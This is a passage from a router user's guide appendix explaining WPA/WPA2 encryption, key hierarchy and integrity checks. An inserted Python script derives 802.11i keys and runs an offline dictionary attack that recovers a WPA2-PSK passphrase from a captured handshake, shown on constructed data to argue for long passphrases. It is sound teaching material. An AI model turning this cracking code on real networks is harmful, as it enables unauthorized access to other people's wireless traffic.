Appendix D Wireless LANs
VMG1312-B Series User’s Guide
345
WPA and WPA2
Wi-Fi Protected Access (WPA) was based on a draft of the IEEE 802.11i standard. WPA2 implements the
full IEEE 802.11i standard and defines stronger encryption, authentication and key management
than WPA.
The key differences between WPA or WPA2 and WEP are improved data encryption and user
authentication.
If both the AP and the wireless clients support WPA2 and you have an external RADIUS server, use
WPA2 for stronger data encryption and per-user authentication. If you do not have an external RADIUS
server, use WPA2-PSK (WPA2 Pre-Shared Key), which only requires a single (identical) passphrase
entered into each access point, wireless gateway and wireless client. As long as the passphrases
match, a wireless client is granted access to the WLAN. Because that one passphrase is all an
attacker needs, choose a long, random one.
If the AP or the wireless clients do not support WPA2, use WPA or WPA-PSK depending on
whether you have an external RADIUS server or not.
Select WEP only when the AP and/or wireless clients do not support WPA or WPA2. WEP is far less
secure than WPA or WPA2: its keys can be recovered from captured traffic with freely available tools.
Encryption
WPA improves on WEP's data encryption with the Temporal Key Integrity Protocol (TKIP), which adds a
Message Integrity Check (MIC), and uses IEEE 802.1X for authentication when a RADIUS server is
present. WPA2 still supports TKIP for backward compatibility, but its mandatory cipher is the
Advanced Encryption Standard (AES) in Counter mode with Cipher Block Chaining Message
Authentication Code Protocol (CCMP), which is considerably stronger than TKIP.
TKIP uses 128-bit temporal keys derived from a master key that the authentication server (or the
pre-shared key) supplies. It mixes each temporal key with the packet sequence number to produce a
distinct per-packet RC4 key, adds a Message Integrity Check (MIC) named Michael, uses an extended
48-bit initialization vector (IV) with sequencing rules to reject replayed packets, and includes a
re-keying mechanism. CCMP uses AES, a block cipher based on the Rijndael algorithm, with 128-bit
keys: counter mode provides confidentiality and CBC-MAC provides integrity, and a 48-bit packet
number serves as both nonce and replay counter, so CCMP needs neither Michael nor per-packet key
mixing.
WPA and WPA2 also rotate the encryption keys periodically, so that no key stays in use long enough
to be attacked.
When a RADIUS server is used, it delivers a Pairwise Master Key (PMK) to the AP after the client
authenticates with IEEE 802.1X; in PSK mode the pre-shared key itself is the PMK. The AP and the
client then run a four-way handshake that derives a fresh Pairwise Transient Key (PTK) from the
PMK for each association, and from the PTK the keys that protect every data packet exchanged
between the AP and that client. This all happens automatically in the background.
The Message Integrity Check (MIC) is designed to prevent an attacker from capturing data packets,
altering them and resending them. The MIC is a keyed function of the packet contents: the
transmitter computes it and sends it with the packet, the receiver recomputes it and compares the
two values, and if they do not match the packet is assumed to have been tampered with and is dropped.
Per-packet keys (TKIP) or per-packet nonces (CCMP), combined with the integrity check (MIC), make
traffic on a WPA or WPA2 network much harder to decrypt or forge than on a WEP network, and make it
harder for an intruder to break into the network.
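The following Python script is an added example, not code from this guide or from the VMG1312-B firmware. It walks through the key hierarchy described above (PMK, then PTK via the four-way handshake, then the MIC on an EAPOL-Key frame) and then shows why the shared passphrase of WPA(2)-PSK is the weak point: everything except the passphrase is public, so an attacker who captured one handshake can test candidate passphrases offline until the recomputed MIC matches. The key-derivation rules (PBKDF2-HMAC-SHA1 over passphrase and SSID, the PRF for the PTK, HMAC-SHA1 for the version-2 MIC) and the EAPOL-Key frame layout are those of IEEE 802.11i; the SSID, MAC addresses, nonces, passphrase and candidate word list are constructed for the demonstration.

```python
import hashlib
import hmac

# IEEE 802.11i pre-shared key: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
def wpa_psk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

# 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || counter) blocks.
def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]

# Pairwise key hierarchy: PTK = PRF(PMK, "Pairwise key expansion", MACs and nonces in sorted order).
# The first 48 bytes are the KCK (EAPOL MIC key), KEK (key-wrap key) and TK (data encryption key);
# TKIP's 64-byte PTK adds two Michael keys, so the CCMP-sized 48 bytes are returned here.
def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes):
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return ptk[:16], ptk[16:32], ptk[32:48]

# Offset of the 16-byte MIC field: 802.1X header (4) + descriptor type (1) + key info (2)
# + key length (2) + replay counter (8) + nonce (32) + IV (16) + RSC (8) + reserved (8).
MIC_OFFSET = 81

# Build an EAPOL-Key frame (RSN key descriptor, type 2) with the 802.11i field layout.
def eapol_key_frame(key_info: int, replay: int, nonce: bytes, mic: bytes, key_data: bytes) -> bytes:
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay.to_bytes(8, "big") + nonce + bytes(16) + bytes(8) + bytes(8)
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL version 2, type 3 (Key)

# EAPOL-Key MIC for key descriptor version 2 (AES/CCMP): HMAC-SHA1 over the frame with the
# MIC field zeroed, truncated to 128 bits. (Version 1, TKIP, uses HMAC-MD5 instead.)
def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

# Receiver-side check from the text: recompute the MIC and compare it in constant time.
def mic_valid(kck: bytes, frame: bytes) -> bool:
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])

# Offline dictionary attack on a captured handshake: only the passphrase is unknown.
def crack_psk(ssid, aa, spa, anonce, snonce, msg2, candidates):
    for cand in candidates:
        kck, _, _ = derive_ptk(wpa_psk(cand, ssid), aa, spa, anonce, snonce)
        if mic_valid(kck, msg2):
            return cand
    return None

# Constructed sample handshake (not a real capture): a weak passphrase on a hypothetical SSID.
SSID = "ZyXEL_Demo"
PASSPHRASE = "sunflower2019"
AA = bytes.fromhex("0013498a1b2c")    # AP MAC address (constructed)
SPA = bytes.fromhex("001d0f3344aa")   # client MAC address (constructed)
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()

# Message 2 of the four-way handshake as the client would send it: SNonce plus a MIC under the KCK.
def build_sample_msg2(passphrase: str = PASSPHRASE) -> bytes:
    kck, _, _ = derive_ptk(wpa_psk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    unsigned = eapol_key_frame(0x010A, 1, SNONCE, bytes(16), b"")  # version 2, pairwise, MIC bit
    return eapol_key_frame(0x010A, 1, SNONCE, eapol_mic(kck, unsigned), b"")

if __name__ == "__main__":
    msg2 = build_sample_msg2()
    words = ["password", "letmein", "sunflower2019", "correcthorse"]
    print("recovered passphrase:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, msg2, words))
```

The SSID, both MAC addresses, both nonces and the MIC all travel in the clear during the handshake, so a single captured handshake allows unlimited offline guesses at the cost of 4096 SHA-1 rounds each; a long random passphrase is the only defence in PSK mode, while the RADIUS (enterprise) mode avoids the problem by giving each user distinct credentials and a fresh PMK.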
The encryption mechanisms used by WPA(2) and WPA(2)-PSK are the same. The only difference
between the two is that WPA(2)-PSK uses a single shared passphrase instead of user-specific
credentials. The shared-passphrase approach makes WPA(2)-PSK susceptible to brute-force